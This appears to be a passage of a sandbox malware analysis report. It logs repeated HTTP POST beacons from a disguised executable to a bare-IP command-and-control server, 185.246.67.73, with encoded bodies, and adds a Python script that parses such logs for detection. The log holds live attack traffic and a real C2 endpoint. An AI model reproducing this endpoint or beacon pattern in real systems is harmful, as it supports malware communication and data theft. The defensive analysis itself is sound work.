Dec 8, 2024 15:27:53.996576071 CET | 562 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 185.246.67.73
Content-Length: 2580
Expect: 100-continue
Connection: Keep-Alive
Dec 8, 2024 15:27:54.384280920 CET | 2580 | OUT | Data Raw: (2580-byte encoded request body; hex/ASCII dump omitted)
Dec 8, 2024 15:27:55.315921068 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 8, 2024 15:27:55.548507929 CET | 207 | IN | HTTP/1.1 200 OK
Date: Sun, 08 Dec 2024 14:27:55 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 34 5b 40 58
Data Ascii: 4[@X


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.4 | 49770 | 185.246.67.73 | 80 | 8028 | C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 15:27:55.786500931 CET | 562 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 185.246.67.73
Content-Length: 2584
Expect: 100-continue
Connection: Keep-Alive
Dec 8, 2024 15:27:56.138292074 CET | 2584 | OUT | Data Raw: (2584-byte encoded request body; hex/ASCII dump omitted)
Dec 8, 2024 15:27:57.123464108 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 8, 2024 15:27:57.356297970 CET | 207 | IN | HTTP/1.1 200 OK
Date: Sun, 08 Dec 2024 14:27:56 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 34 5b 40 58
Data Ascii: 4[@X


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.4 | 49771 | 185.246.67.73 | 80 | 8028 | C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 15:27:57.359291077 CET | 562 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 185.246.67.73
Content-Length: 1904
Expect: 100-continue
Connection: Keep-Alive
Dec 8, 2024 15:27:57.716389894 CET | 1904 | OUT | Data Raw: (1904-byte encoded request body; hex/ASCII dump omitted)
                                                                                                                      Dec 8, 2024 15:27:58.689357996 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:27:58.924663067 CET380INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:27:58 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Length: 152
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 06 13 39 1d 32 35 05 1d 2a 2a 21 03 31 12 2c 07 27 16 01 15 29 1e 38 06 27 3a 38 5a 2c 39 28 0d 20 02 20 1b 30 04 3b 03 36 12 06 0e 2c 38 20 5a 06 10 21 5d 25 3c 23 12 3f 2b 0b 5a 24 38 2d 42 21 27 20 19 27 2d 34 0a 29 3a 29 07 23 3f 2f 55 26 03 08 0e 2e 1c 36 5f 27 23 33 13 25 36 2c 55 0f 1f 26 50 27 1c 0d 55 22 27 39 0f 22 09 20 02 32 43 2e 56 35 11 3f 0e 3c 04 37 03 3f 32 27 04 23 31 3f 10 3a 3b 00 00 3d 0c 20 08 30 2c 20 53 2a 02 2e 54 0d 33 56 52
                                                                                                                      Data Ascii: 925**!1,')8':8Z,9( 0;6,8 Z!]%<#?+Z$8-B!' '-4):)#?/U&.6_'#3%6,U&P'U"'9" 2C.V5?<7?2'#1?:;= 0, S*.T3VR
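The sessions in this section repeat one exchange: a POST with an application/octet-stream body to a fixed .php path on a bare-IP Host, answered by either a 4-byte body or a body of about 152 bytes. The script below is an added example, not part of the Joe Sandbox report and not DCRat tooling: it parses transcripts in the report's flattened "Timestamp / Bytes transferred / Direction / Data" layout (tolerating an optional " | " cell separator), pairs each request with its final response, and derives triage features from the result. The SAMPLE transcript is constructed from two of the sessions above with the URI path and the bodies shortened; the feature names, and the heuristic that Expect: 100-continue on a POST is the default behaviour of .NET's HttpWebRequest, are the author's assumptions rather than sandbox signatures. No attempt is made to decode the request or response bodies.

```python
"""Parse Joe Sandbox-style HTTP session transcripts and summarise the beacon pattern (added example)."""
import re
from dataclasses import dataclass, field
from datetime import datetime

# Constructed sample in the report's flattened layout: two sessions, URI path and bodies shortened.
SAMPLE = r"""Session IDSource IPSource PortDestination IPDestination PortPIDProcess
26192.168.2.449771185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
Dec 8, 2024 15:27:57.359291077 CET562OUTPOST /Uploads/server9/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 185.246.67.73
Content-Length: 1904
Expect: 100-continue
Dec 8, 2024 15:27:57.716389894 CET1904OUTData Raw: 55 59 46 56 5e 47 50 54
Data Ascii: UYFV^GPT
Dec 8, 2024 15:27:58.689357996 CET25INHTTP/1.1 100 Continue
Dec 8, 2024 15:27:58.924663067 CET380INHTTP/1.1 200 OK
Content-Length: 152
Data Ascii: 925
Session IDSource IPSource PortDestination IPDestination PortPIDProcess
27192.168.2.449772185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
Dec 8, 2024 15:27:57.522468090 CET562OUTPOST /Uploads/server9/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 185.246.67.73
Content-Length: 2584
Expect: 100-continue
Dec 8, 2024 15:27:59.088303089 CET207INHTTP/1.1 200 OK
Content-Length: 4
Data Raw: 34 5b 40 58
Data Ascii: 4[@X
"""

# A frame row: timestamp, zone, byte count, IN/OUT, payload; cells may be glued together or " | "-separated.
FRAME = re.compile(r"^(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4} \d\d:\d\d:\d\d\.\d+) [A-Z]{3,4}"
                   r"\s*\|?\s*(?P<size>\d+)\s*\|?\s*(?P<dir>IN|OUT)\s*\|?\s*(?P<data>.*)$")

@dataclass
class Exchange:
    started: datetime = datetime.min
    request_line: str = ""
    req_headers: dict = field(default_factory=dict)
    resp_headers: dict = field(default_factory=dict)
    resp_body: str = ""

def parse_ts(s):
    head, frac = s.rsplit(".", 1)  # strptime's %f accepts at most six digits; the report has nine
    return datetime.strptime(f"{head}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")

def parse_transcript(text):
    exchanges, cur, side = [], None, ""  # side: owner ("req"/"resp") of the header/body lines that follow
    for line in (l.strip() for l in text.splitlines()):
        if line.startswith("Session ID"):                      # a new session table starts
            cur = Exchange()
            exchanges.append(cur)
            side = ""
        elif cur is None:
            continue
        elif (m := FRAME.match(line)):                          # timestamped frame row
            data = m.group("data")
            if m.group("dir") == "OUT" and " HTTP/" in data:    # request line
                cur.started, cur.request_line, side = parse_ts(m.group("ts")), data, "req"
            elif data.startswith("HTTP/") and "100 Continue" not in data:
                side = "resp"                                   # final status line; response headers follow
            # "Data Raw" frames and the interim 100 Continue carry nothing we need
        elif line.startswith("Data Ascii:"):
            if side == "resp":
                cur.resp_body = line[len("Data Ascii:"):].strip()
        elif side and ": " in line and not line.startswith("Data Raw:"):
            key, value = line.split(": ", 1)
            (cur.req_headers if side == "req" else cur.resp_headers)[key.lower()] = value
    return [e for e in exchanges if e.request_line]

BROWSER_HEADERS = ("accept", "accept-language", "accept-encoding", "referer")

def suspicious_features(e):
    """Triage heuristics for one request; the labels are this example's own, not sandbox signatures."""
    h, flags = e.req_headers, []
    if re.fullmatch(r"\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?", h.get("host", "")):
        flags.append("bare-ip-host")
    if "Mozilla/" in h.get("user-agent", "") and not any(k in h for k in BROWSER_HEADERS):
        flags.append("browser-ua-without-browser-headers")      # a real browser sends Accept* headers
    if e.request_line.startswith("POST ") and h.get("content-type") == "application/octet-stream" \
            and ".php" in e.request_line:
        flags.append("octet-stream-post-to-php")
    if h.get("expect", "").lower() == "100-continue":
        flags.append("expect-100-continue")                     # assumption: .NET HttpWebRequest default
    return flags

def beacon_summary(exchanges):
    posts = [e for e in exchanges if e.request_line.startswith("POST ")]
    starts = sorted(e.started for e in posts)
    gaps = [(b - a).total_seconds() for a, b in zip(starts, starts[1:])]
    return {
        "requests": len(posts),
        "distinct_uris": len({e.request_line.split()[1] for e in posts}),
        "hosts": sorted({e.req_headers.get("host", "") for e in posts}),
        "response_sizes": sorted({int(e.resp_headers["content-length"])
                                  for e in posts if "content-length" in e.resp_headers}),
        "short_replies": sum(1 for e in posts if e.resp_body == "4[@X"),
        "mean_gap_s": sum(gaps) / len(gaps) if gaps else 0.0,
    }
```

Run `beacon_summary(parse_transcript(SAMPLE))` to get the request count, URI and host cardinality, the set of response sizes and the mean spacing between POSTs; `suspicious_features` on each exchange returns the four flags for both sample sessions. The check worth repeating on a live capture is the second one: the User-Agent claims Chrome/Edge, yet no Accept, Accept-Language, Accept-Encoding or Referer header is sent, which a real browser would always add; that mismatch, more than the UA string or the odd path, is what separates this client from web traffic.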


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.4 | 49772 | 185.246.67.73 | 80 | 8028 | C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 15:27:57.522468090 CET | 562 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 185.246.67.73
Content-Length: 2584
Expect: 100-continue
Connection: Keep-Alive
Dec 8, 2024 15:27:57.872934103 CET | 2584 | OUT | Data Raw: 50 59 43 50 5b 43 55 5e 54 5e 50 59 5b 5b 59 5d 59 59 59 59 57 5c 51 5d 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
Data Ascii: PYCP[CU^T^PY[[Y]YYYYW\Q]YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.Z$=^&)5Z6369:\"+98<R'(%05& /(/+ ]!![ ,
Dec 8, 2024 15:27:58.853537083 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 8, 2024 15:27:59.088303089 CET | 207 | IN | HTTP/1.1 200 OK
Date: Sun, 08 Dec 2024 14:27:58 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 34 5b 40 58
Data Ascii: 4[@X


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.4 | 49778 | 185.246.67.73 | 80 | 8028 | C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 15:27:59.332180977 CET | 538 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 185.246.67.73
Content-Length: 2580
Expect: 100-continue
Dec 8, 2024 15:27:59.685121059 CET | 2580 | OUT | Data Raw: 50 59 46 57 5b 49 50 53 54 5e 50 59 5b 58 59 5e 59 5d 59 5c 57 57 51 5d 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
Data Ascii: PYFW[IPST^PY[XY^Y]Y\WWQ]YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y-'_%9653%Y97)78%;0>8[25&;.\#/']/; ]!![ 4
Dec 8, 2024 15:28:00.660453081 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 8, 2024 15:28:00.896447897 CET | 151 | IN | HTTP/1.1 200 OK
Date: Sun, 08 Dec 2024 14:28:00 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Content-Type: text/html; charset=UTF-8
Data Raw: 34 5b 40 58
Data Ascii: 4[@X


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.4 | 49784 | 185.246.67.73 | 80 | 8028 | C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 15:28:01.130518913 CET | 562 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 185.246.67.73
Content-Length: 2584
Expect: 100-continue
Connection: Keep-Alive
Dec 8, 2024 15:28:01.482070923 CET | 2584 | OUT | Data Raw: 50 5a 43 5c 5b 46 55 55 54 5e 50 59 5b 5f 59 5c 59 5d 59 58 57 5c 51 59 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
Data Ascii: PZC\[FUUT^PY[_Y\Y]YXW\QYYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.3=X19)]! 6,7*]"8*[;($$[%3*%>^4\.+ ]!![
Dec 8, 2024 15:28:02.461975098 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 8, 2024 15:28:02.700519085 CET | 207 | IN | HTTP/1.1 200 OK
Date: Sun, 08 Dec 2024 14:28:02 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 34 5b 40 58
Data Ascii: 4[@X


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.4 | 49790 | 185.246.67.73 | 80 | 8028 | C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 15:28:02.940985918 CET | 562 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 185.246.67.73
Content-Length: 2584
Expect: 100-continue
Connection: Keep-Alive
Dec 8, 2024 15:28:03.294548988 CET | 2584 | OUT | Data Raw: 55 5c 43 51 5e 45 50 52 54 5e 50 59 5b 5e 59 5f 59 58 59 57 57 51 51 58 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
Data Ascii: U\CQ^EPRT^PY[^Y_YXYWWQQXYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.$=$*)6 69.X7;),;;'1V*\';&"<].+ ]!![ 8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.4 | 49791 | 185.246.67.73 | 80 | 8028 | C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 15:28:04.077606916 CET | 562 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 185.246.67.73
Content-Length: 1864
Expect: 100-continue
Connection: Keep-Alive
Dec 8, 2024 15:28:04.435139894 CET | 1864 | OUT | Data Raw: 50 52 43 51 5e 45 50 54 54 5e 50 59 5b 58 59 53 59 5a 59 5e 57 51 51 5a 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
Data Ascii: PRCQ^EPTT^PY[XYSYZY^WQQZYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y._'>!X%!X#0::"785/8?0-,% -&;*X#Z?[.+ ]!![
Dec 8, 2024 15:28:05.398590088 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 8, 2024 15:28:05.636485100 CET | 380 | IN | HTTP/1.1 200 OK
Date: Sun, 08 Dec 2024 14:28:05 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 152
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 06 13 39 50 31 1b 0d 10 2a 14 07 04 32 2c 38 02 33 01 2f 15 3d 56 37 5b 25 39 30 5f 3b 04 0d 1c 23 2c 30 14 27 04 2c 1e 22 2f 23 15 2d 28 20 5a 06 10 22 03 25 11 2c 05 28 28 25 14 26 06 39 0a 35 34 28 1d 33 13 01 53 3e 03 26 5e 37 06 3c 0a 32 3e 2a 0a 2e 26 22 5c 31 30 05 1e 27 36 2c 55 0f 1f 25 0b 24 32 27 1f 37 27 36 57 21 0e 23 5d 26 0b 26 15 22 2c 3c 1b 28 2d 2b 02 28 1c 05 01 23 31 3f 1d 2d 15 2e 01 29 1c 2c 0c 30 2c 20 53 2a 02 2e 54 0d 33 56 52
Data Ascii: 9P1*2,83/=V7[%90_;#,0',"/#-( Z"%,((%&954(3S>&^7<2>*.&"\10'6,U%$2'7'6W!#]&&",<(-+(#1?-.),0, S*.T3VR


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.4 | 49792 | 185.246.67.73 | 80 | 8028 | C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 15:28:04.385284901 CET | 562 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 185.246.67.73
Content-Length: 2584
Expect: 100-continue
Connection: Keep-Alive
Dec 8, 2024 15:28:04.732068062 CET | 2584 | OUT | Data Raw: 50 5e 46 57 5b 46 55 50 54 5e 50 59 5b 5a 59 5e 59 59 59 5a 57 55 51 5c 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
Data Ascii: P^FW[FUPT^PY[ZY^YYYZWUQ\YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y-'!196#5].&7(:^/,W$X#%V>%+!",;/ ]!![ (
Dec 8, 2024 15:28:05.749109983 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 8, 2024 15:28:05.984385014 CET | 207 | IN | HTTP/1.1 200 OK
Date: Sun, 08 Dec 2024 14:28:05 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 34 5b 40 58
Data Ascii: 4[@X


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.4 | 49798 | 185.246.67.73 | 80 | 8028 | C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 15:28:06.221746922 CET | 538 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 185.246.67.73
Content-Length: 2584
Expect: 100-continue
Dec 8, 2024 15:28:06.575860977 CET | 2584 | OUT | Data Raw: 50 5f 43 53 5e 44 50 53 54 5e 50 59 5b 5e 59 59 59 55 59 58 57 55 51 56 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
Data Ascii: P_CS^DPST^PY[^YYYUYXWUQVYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.Z0-$*5Z"#5]:$48/(3$= '36&+7<, ]!![ 8
Dec 8, 2024 15:28:07.590177059 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 8, 2024 15:28:07.824384928 CET | 151 | IN | HTTP/1.1 200 OK
Date: Sun, 08 Dec 2024 14:28:07 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Content-Type: text/html; charset=UTF-8
Data Raw: 34 5b 40 58
Data Ascii: 4[@X


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      34192.168.2.449804185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:28:08.074579000 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:28:08.419606924 CET | 2584 | OUT | Data Raw: 50 52 46 57 5e 42 55 56 54 5e 50 59 5b 5a 59 5b 59 58 59 57 57 51 51 57 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
